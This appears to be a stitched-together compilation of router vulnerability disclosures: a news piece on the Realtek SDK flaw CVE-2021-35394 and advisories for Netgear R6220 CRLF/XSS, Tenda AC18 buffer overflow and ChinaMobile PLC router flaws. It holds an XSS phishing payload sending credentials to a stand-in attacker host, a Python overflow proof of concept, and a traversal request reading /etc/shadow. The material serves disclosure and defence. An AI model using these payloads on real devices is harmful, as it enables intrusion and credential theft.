Note that other Netgear products were affected by the same vulnerability.

**References**

https://kb.netgear.com/000065242/Security-Advisory-for-Pre-authentication-Stack-Overflow-on-some-Routers-and-Nighthawk-WiFi-Mesh-Systems-PSV-2022-0146

CVE-2022-48176: Netgear Nighthawk r7000p aws_json Unauthenticated Double Stack Overflow Vulnerability

By Deeba Ahmed
This is a critical vulnerability affecting almost 190 models of devices from 66 different manufacturers.
This is a post from HackRead.com Read the original post: Critical Realtek Vulnerability Impacting IoT Devices Worldwide

As of December 2022, Unit 42 researchers had observed 134 million exploit attempts leveraging this vulnerability, and around 97 of them occurred at the beginning of August 2022.

According to a new report from Palo Alto Networks’ Unit 42 researchers, between August and October 2022, cybercriminals increased their efforts to exploit a Realtek Jungle SDK vulnerability.

Usually, researchers record 10% of all attacks targeting a single vulnerability. But in this case, over 40% of all attacks involved exploitation of the Realtek remote code execution **(RCE)** vulnerability.

**Vulnerability Analysis**

The Realtek Jungle SDK RCE is tracked as **CVE-2021-35394**, rated 9.8. As of December 2022, Unit 42 researchers had observed 134 million exploit attempts leveraging this vulnerability, and around 97 of them occurred at the beginning of August 2022.

This is a critical vulnerability affecting almost 190 models of devices from 66 different manufacturers.

Hackers find it useful because it can create **supply-chain issues** that make it difficult for users to identify the products that attackers are exploiting. It’s an arbitrary command injection and buffer overflow bug that could be leveraged to execute arbitrary code and gain the highest level of privileges, eventually hijacking the infected device appliance.

**Attack Details**

According to Unit 42’s **blog post**, most of the attacks observed were attempts to deliver malware and compromise **vulnerable IoT devices**, indicating that threat actors aim to launch large-scale attacks against internet-connected devices worldwide.

Around 50% of the attacks (48.3% to be precise) were launched from the USA, followed by Vietnam (17.8%) and Russia (14.6%). Other prominent regions include the Netherlands (7.4%), Germany (2.3%), France (6.4%), and Luxembourg (1.6%).

Moreover, 95% of the attacks targeting the vulnerability and originating from Russia were launched against Australian organizations.

**Potential Dangers**

Unit 42 identified three kinds of payloads that were distributed through in-the-wild exploitation of this bug. The first payload was a script that executed a shell command on the targeted server and downloaded another malware.

The second payload is an injected command that writes a binary payload to a file and executes that file. The third is an injected command that directly reboots the targeted server to launch DoS (denial of service) attacks.

Additionally, attackers can exploit this bug to deliver known botnets such as **Mozi**, **Mirai**, **Gafgyt**, and the new Golang-based DDoS botnet called RedGoBot.

Vulnerable IoT devices include IP cameras, routers, residential gateways, and Wi-Fi repeaters from at least 66 vendors, including Belkin, D-Link, ASUS, Huawei, LG, ZTE, Logitech, Zyxel, and **NETGEAR**.

**_More IoT Security News_**

1.  BotenaGo botnet malware targeting millions of IoT devices
2.  IoT Devices Hacked to Install Ransomware on OT Networks
3.  ThroughTek Flaw Exposed Millions of IoT Cameras to Spying
4.  Millions of IoT devices, baby monitors open to video snooping
5.  Access:7 Supply Chain Flaws Impact ATMs, Medical, IoT devices

Critical Realtek Vulnerability Impacting IoT Devices Worldwide

The web interface of the 'Nighthawk R6220 AC1200 Smart Wi-Fi Router' is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection. A malicious unauthenticated attacker can exploit this vulnerability using a specially crafted URL. This affects firmware versions: V1.1.0.112_1.0.1, V1.1.0.114_1.0.1.

**Response Splitting via CRLF****Description**

CRLF (Carriage Return Line Feed) Injection CWE-93: https://cwe.mitre.org/data/definitions/93.html

Response splitting via Carriage Return Line Feed (CRLF) is a vulnerability that exploits the way HTTP headers parse certain characters such as \\rand \\n. Appending these characters to HTTP headers can allow the insertion of payloads into a header which can result in the manipulation of cookies, server information, and status codes.

Type: Unauthenticated Remote attack

Tested on firmware version: V1.1.0.112\_1.0.1, V1.1.0.114\_1.0.1

**Details**

The web interface of the 'Nighthawk R6220 AC1200 Smart Wi-Fi Router' is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection.

This issue affects the custom 404 page that is served when a request is issued for a page that does not exist. By leveraging this vulnerability, an unauthenticated remote attacker is able to inject arbitrary HTML and JavaScript code to be executed in a user's browser.

**Impact**

A malicious attacker can exploit this vulnerability using a specially crafted URL. If this URL is opened by an administrator, the attacker can achieve the following:

1.  Perform actions on the administrative portion of the web application Example payload that enables the debug telnet interface: https://192.168.1.1/666%0A%0A%3Cscript%3Edocument.location=%22https://192.168.1.1/setup.cgi?todo=debug%22;%3C/script%3E
    
2.  Obtain the administrator's credentials through phishing Example phishing payload: https://192.168.1.1/123%0A%0A%3Cscript>var name=prompt("Username");var pass=prompt("Password");document.location="http://attacker.server/?user="+name+"?pass="+pass;</script>
    

Note that if another vulnerability is presented in the administrative portal such as a Remote Command Execution (RCE), an attacker can use a specially crafted URL and chain the two vulnerabilities to create a one-click exploit.

**Evidence**

The request consists of a resource that does not exist ("xsstesty") followed by Line-Feed characters (%0A%0A) and the JavaScript payload.

Request

    GET /xsstesty%0A%0A%3Cscript%3Ealert('xss');%3C/script%3E 
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Cookie: sessionid=sid17289xxx158005xxx1087458037
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    

Note that the HTTP response headers are embedded directly into the 404 page response body and the payload is executed on the victim's browser.

Response Body

    <script>alert('xss');</script> HTTP/1.1 404 Not Found
    Server: 
    Date: Fri, 02 Jan 1970 02:44:27 GMT
    Content-Type: text/html
    P3P: 443
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1;mode=block
    X-Content-Type-Options: nosniff
    Connection: close
    
            <HTML>
            <HEAD><TITLE>404 Not Found</TITLE></HEAD>
            <BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
            <H4>404 Not Found</H4>
    File not found.
    </BODY>
    </HTML>
    

**Remediation**

Sanitize and neutralize all user-supplied data or properly encode output in HTTP headers that would otherwise be visible to users in order to prevent the injection of CRLF sequences and their consequences.

CVE-2022-47052: NETGEAR/CVE-2022-47052 at main · dest-3/NETGEAR

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via /goform/formWifiBasicSet.

****CVE-2023-24166****

Tenda AC18 Unauthorized stack overflow vulnerability

****1\. Affected version:****

Tenda ac18\_kf\_V15.03.05.19(6318\_)\_cn

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

The function "formWifiBasicSet" contains a stack-based buffer overflow vulnerability. In the function, it reads in a user-provided parameter, and the variable is passed to the function without any length check, which may lead to overflow of the stack-based buffer. As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

import requests
from pwn import \*

url \= 'http://x.x.x.x/goform/WifiBasicSet'
pl \= 'a'\*564+p32(0xdeadbeef)
data \= {'security\_5g':pl, 'hideSsid':'1', 'ssid':'1', 'security':'1', 'wrlPwd':'1', 'hideSsid\_5g':'1', 'ssid\_5g':'1', 'wrlPwd\_5g': '1'}

requests.post(url, data\=data)

**5\. Author**

Drizzling\_Sun @KRlab

CVE-2023-24166: Tenda/2.md at main · DrizzlingSun/Tenda

An issue was discovered in the default configuration of ChinaMobile PLC Wireless Router model GPN2.4P21-C-CN running the firmware version W2000EN-01(hardware platform Gpn2.4P21-C_WIFI-V0.05), allows attackers to gain access to the configuration interface.

**Blank passwords and default factory settings**

ChinaMobile PLC Wireless Router model GPN2.4P21-C-CN running the firmware version W2000EN-01(hardware platform Gpn2.4P21-C\_WIFI-V0.05) is shipped and deployed without an administrative password on port **8080** and the web configuration interface is accessible using the following syntax: **http://<target ip>:8080.** From the configuration page an attacker can change the router configuration or he can try to obtain access to the internal network.

**Directory traversal vulnerability**

A different directory traversal vulnerability than the one identified by Rahul Raz (https://www.exploit-db.com/exploits/40304) was identified by using:

**_GET /cgi-bin/webproc?getpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow&errorpage=html/main.html&var:language=zh\_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage=-_**

to retrieve the **_etc/shadow_** file where two user accounts were identified with the corresponding hashed passwords:

**root:<hash\_deleted>:13796:0:99999:7:::**

**#tw:<hash\_deleted>:13796:0:99999:7:::**

**Attack surface**

Over 4,320 vulnerable PLC Wireless routers were identified using Shodan. Most of the devices are located in South America (Argentina, Brazil, Honduras, Colombia) followed by Asia (Indonesia, India, Thailand).

**Remediation**

Adding a password to the admin user accounts should reduce the risk of being exploited. The risk of a successful directory traversal still exist and given the fact that the user can’t change the **tw** account password other risk mitigation strategies should be employed.

CVE-2020-18330: Insecure permissions and multiple vulnerabilities in ChinaMobile PLC wireless routers leaves more than 4,300 devices vulnerable to remote attacks

Tag

#wifi